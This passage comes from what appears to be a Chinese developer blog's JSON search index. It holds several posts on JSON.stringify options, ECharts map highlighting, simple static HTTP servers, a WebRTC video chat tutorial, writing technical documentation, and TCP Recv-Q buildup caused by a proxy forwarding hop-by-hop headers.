age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return undefined; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能3: 通过数组过滤某些属性 只需要name属性和addr属性,其他不要。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, [\u0026#39;name\u0026#39;, \u0026#39;addr\u0026#39;]); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2.2. space space可以是数字或者是字符串, 如果是数字则表示属性名前加上空格符号的数量,如果是字符串,则直接在属性名前加上该字符串。\n功能1: 给输出属性前加上n个空格\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, 4); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能2: tab格式化输出\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, \u0026#39;\\t\u0026#39;); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能3: 搞笑\nJSON.stringify(user, null, \u0026#39;good\u0026#39;); \u0026#34;{ good\u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, good\u0026#34;isDead\u0026#34;: false, good\u0026#34;age\u0026#34;: 11, good\u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 2.3. 深拷贝 var user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; var temp = JSON.stringify(user); var user2 = JSON.parse(temp); 3. 其他 JSON.parse() 其实也是支持第二个参数的。功能类似于JSON.stringify的第二个参数的功能。\n4. 参考 MDN JSON.stringify() ","permalink":"https://wdd.js.org/posts/2018/02/json-stringify-powerful/","summary":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.","title":"你不知道的JSON.stringify()妙用"},{"content":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我改变了一个方法。这个方法的核心思路是定时获取图标的配置,然后更新配置,最后在设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.5)\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; }, emphasis:{ areaColor: \u0026#39;#3be2fb\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; } } } ] }; // 使用刚指定的配置项和数据显示图表。 myChart.setOption(option); myChart.on(\u0026#39;click\u0026#39;, function(params) { console.log(params); }); setInterval(function(){ var op = myChart.getOption(); var data = op.series[0].data; var length = data.length; data.some(function(item, index){ if(item.selected){ item.selected = false; var next = (index + 1)%length; data[next].selected = true; return true; } }); myChart.setOption(op); }, 3000); 2. 后续补充 我从这里发现:https://github.com/ecomfe/echarts/issues/3282,选中地图的写法是这样的,而试了一下果然可以。主要是type要是mapSelect,而不是geoSelect\nmyChart.dispatchAction({ type: \u0026#39;mapSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 // seriesIndex: 0, // 可选,系列名称,可以是一个数组指定多个系列 // seriesName: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 // dataIndex: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name: \u0026#39;河北\u0026#39; }); 3. 哪里去下载中国地图? 官方示例里是没有中国地图的,不过你可以去github的官方仓库里找。地址是:https://github.com/apache/incubator-echarts/tree/master/map\n4. 地图学习的栗子哪里有? 4.1. 先学习一下美国地图怎么玩吧 echarts官方文档上有美国地图的实例,地址:http://echarts.baidu.com/examples/editor.html?c=map-usa\n4.2. 我国地图也是有的,参考iphone销量这个栗子 地址:http://echarts.baidu.com/option.html#series-map, 注意:地图的相关文档在series-\u0026gt;type:map中\n","permalink":"https://wdd.js.org/posts/2018/02/echarts-highlight-china-map/","summary":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我改变了一个方法。这个方法的核心思路是定时获取图标的配置,然后更新配置,最后在设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.","title":"ECharts 轮流高亮中国地图各个省份"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs 2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2018/02/one-command-create-static-file-server/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":" 本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.error(error); } drone.on(\u0026#39;open\u0026#39;, function(error){ if (error) { return console.error(error);} room = drone.subscribe(roomName); room.on(\u0026#39;open\u0026#39;, function(error){ if (error) {onError(error);} }); // 已经链接到房间后,就会收到一个 members 数组,代表房间里的成员 // 这时候信令服务已经就绪 room.on(\u0026#39;members\u0026#39;, function(members){ console.log(\u0026#39;MEMBERS\u0026#39;, members); // 如果你是第二个链接到房间的人,就会创建offer var isOfferer = members.length === 2; startWebRTC(isOfferer); }); }); // 通过Scaledrone发送信令消息 function sendMessage(message) { drone.publish({ room: roomName, message }); } function startWebRTC(isOfferer) { pc = new RTCPeerConnection(configuration); // 当本地ICE Agent需要通过信号服务器发送信息到其他端时 // 会触发icecandidate事件回调 pc.onicecandidate = function(event){ if (event.candidate) { sendMessage({ \u0026#39;candidate\u0026#39;: event.candidate }); } }; // 如果用户是第二个进入的人,就在negotiationneeded 事件后创建sdp if (isOfferer) { // onnegotiationneeded 在要求sesssion协商时发生 pc.onnegotiationneeded = function() { // 创建本地sdp描述 SDP (Session Description Protocol) session描述协议 pc.createOffer().then(localDescCreated).catch(onError); }; } // 当远程数据流到达时,将数据流装载到video中 pc.onaddstream = function(event){ remoteVideo.srcObject = event.stream; }; // 获取本地媒体流 navigator.mediaDevices.getUserMedia({ audio: true, video: true, }).then( function(stream) { // 将本地捕获的视频流装载到本地video中 localVideo.srcObject = stream; // 将本地流加入RTCPeerConnection 实例中 发送到其他端 pc.addStream(stream); }, onError); // 从Scaledrone监听信令数据 room.on(\u0026#39;data\u0026#39;, function(message, client){ // 消息是我自己发送的,则不处理 if (client.id === drone.clientId) { return; } if (message.sdp) { // 设置远程sdp, 在offer 或者 answer后 pc.setRemoteDescription(new RTCSessionDescription(message.sdp), function(){ // 当收到offer 后就接听 if (pc.remoteDescription.type === \u0026#39;offer\u0026#39;) { pc.createAnswer().then(localDescCreated).catch(onError); } }, onError); } else if (message.candidate) { // 增加新的 ICE canidatet 到本地的链接中 pc.addIceCandidate( new RTCIceCandidate(message.candidate), onSuccess, onError ); } }); } function localDescCreated(desc) { pc.setLocalDescription(desc, function(){ sendMessage({ \u0026#39;sdp\u0026#39;: pc.localDescription }); },onError); } 5. WebRTC简介 5.1. 介绍 WebRTC 是一个开源项目,用于Web浏览器之间进行实时音频视频通讯,数据传递。 WebRTC有几个JavaScript APIS。 点击链接去查看demo。\ngetUserMedia(): 捕获音频视频 MediaRecorder: 记录音频视频 RTCPeerConnection: 在用户之间传递音频流和视频流 RTCDataChannel: 在用户之间传递文件流 5.2. 在哪里使用WebRTC? Chrome FireFox Opera Android iOS 5.3. 什么是信令 WebRTC使用RTCPeerConnection在浏览器之间传递流数据, 但是也需要一种机制去协调收发控制信息,这就是信令。信令的方法和协议并不是在WebRTC中明文规定的。 在codelad中用的是Node,也有许多其他的方法。\n5.4. 什么是STUN和TURN和ICE? STUN(Session Traversal Utilities for NAT,NAT会话穿越应用程序)是一种网络协议,它允许位于NAT(或多重NAT)后的客户端找出自己的公网地址,查出自己位于哪种类型的NAT之后以及NAT为某一个本地端口所绑定的Internet端端口。这些信息被用来在两个同时处于NAT路由器之后的主机之间创建UDP通信。该协议由RFC 5389定义。 wikipedia STUN\nTURN(全名Traversal Using Relay NAT, NAT中继穿透),是一种资料传输协议(data-transfer protocol)。允许在TCP或UDP的连线上跨越NAT或防火墙。 TURN是一个client-server协议。TURN的NAT穿透方法与STUN类似,都是通过取得应用层中的公有地址达到NAT穿透。但实现TURN client的终端必须在通讯开始前与TURN server进行交互,并要求TURN server产生\u0026quot;relay port\u0026quot;,也就是relayed-transport-address。这时TURN server会建立peer,即远端端点(remote endpoints),开始进行中继(relay)的动作,TURN client利用relay port将资料传送至peer,再由peer转传到另一方的TURN client。wikipedia TURN\nICE (Interactive Connectivity Establishment,互动式连接建立 ),一种综合性的NAT穿越的技术。 互动式连接建立是由IETF的MMUSIC工作组开发出来的一种framework,可整合各种NAT穿透技术,如STUN、TURN(Traversal Using Relay NAT,中继NAT实现的穿透)、RSIP(Realm Specific IP,特定域IP)等。该framework可以让SIP的客户端利用各种NAT穿透方式打穿远程的防火墙。[wikipedia ICE]\nWebRTC被设计用于点对点之间工作,因此用户可以通过最直接的途径连接。然而,WebRTC的构建是为了应付现实中的网络: 客户端应用程序需要穿越NAT网关和防火墙,并且对等网络需要在直接连接失败的情况下进行回调。 作为这个过程的一部分,WebRTC api使用STUN服务器来获取计算机的IP地址,并将服务器作为中继服务器运行,以防止对等通信失败。(现实世界中的WebRTC更详细地解释了这一点。)\n5.5. WebRTC是否安全? WebRTC组件是强制要求加密的,并且它的JavaScript APIS只能在安全的域下使用(HTTPS 或者 localhost)。信令机制并没有被WebRTC标准定义,所以是否使用安全的协议就取决于你自己了。\n6. WebRTC 参考资料 官网教程\nWebRTC 简单的视频聊天 repo\nWebRTC 教程\nMDN WebRTC API\n谷歌codelab WebRT教程\ngithub上WebRTC各种例子\nsegemntfault上关于WebRTC的教程\n","permalink":"https://wdd.js.org/posts/2018/02/webrtc-tutorial-simple-video-chat/","summary":"本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.","title":"120行代码实现 浏览器WebRTC视频聊天"},{"content":" 本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5. markdown 工具推荐 蚂蚁笔记 这是我正使用的。 全平台(mac windows ios)有客户端,和浏览器端 笔记可以直接公布为博客 支持独立域名 标签很好用 支持思维导图 支持历史记录 cmd-markdown 有道云笔记 6. 文档之外 公司有个同事,我曾问他使用什么搜索一些技术文档,他说用百度。作为一个翻墙老司机,我惊诧的问他:你为什么不用谷歌去搜索。他说他不会翻墙。我只能呵呵一笑。\n自从有一次搜索:graph for x^8 + y^8,我就决定不再使用百度了。你可以看一下两者的返回结果有什么不同。\n总之:有些鸟儿是关不住的 他们的羽毛太鲜亮了。\n","permalink":"https://wdd.js.org/posts/2018/02/how-to-write-a-technical-document/","summary":"本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5.","title":"如何写好技术文档?"},{"content":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnetion Keep-Alive Proxy-Authenticate Proxy-Authortization Trailer TE Transfer-Encodeing Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时W eb服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.headers } var proxy = request(option) req.pipe(proxy) proxy.pipe(res) 4. 解决方案 解决方案有两个, 我推荐使用第二个方案,具体方法参考Express 代理中间件的写法\n更改自己的原有代码 使用成熟的开源产品 5. 参考文献 What is the reason for a high Recv-Q of a TCP connection? TCP buffers keep filling up (Recv-Q full): named unresponsive linux探秘:netstat中Recv-Q 深究 深入剖析 Socket——TCP 通信中由于底层队列填满而造成的死锁问题 netstat Recv-Q和Send-Q 深入剖析 Socket——数据传输的底层实现 Use of Recv-Q and Send-Q 【美】David Gourley / Brian Totty HTTP权威指南 【日】上野宣 于均良 图解HTTP ","permalink":"https://wdd.js.org/posts/2018/02/tcp-high-recv-q-or-send-q-reasons/","summary":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnetion Keep-Alive Proxy-Authenticate Proxy-Authortization Trailer TE Transfer-Encodeing Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时W eb服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 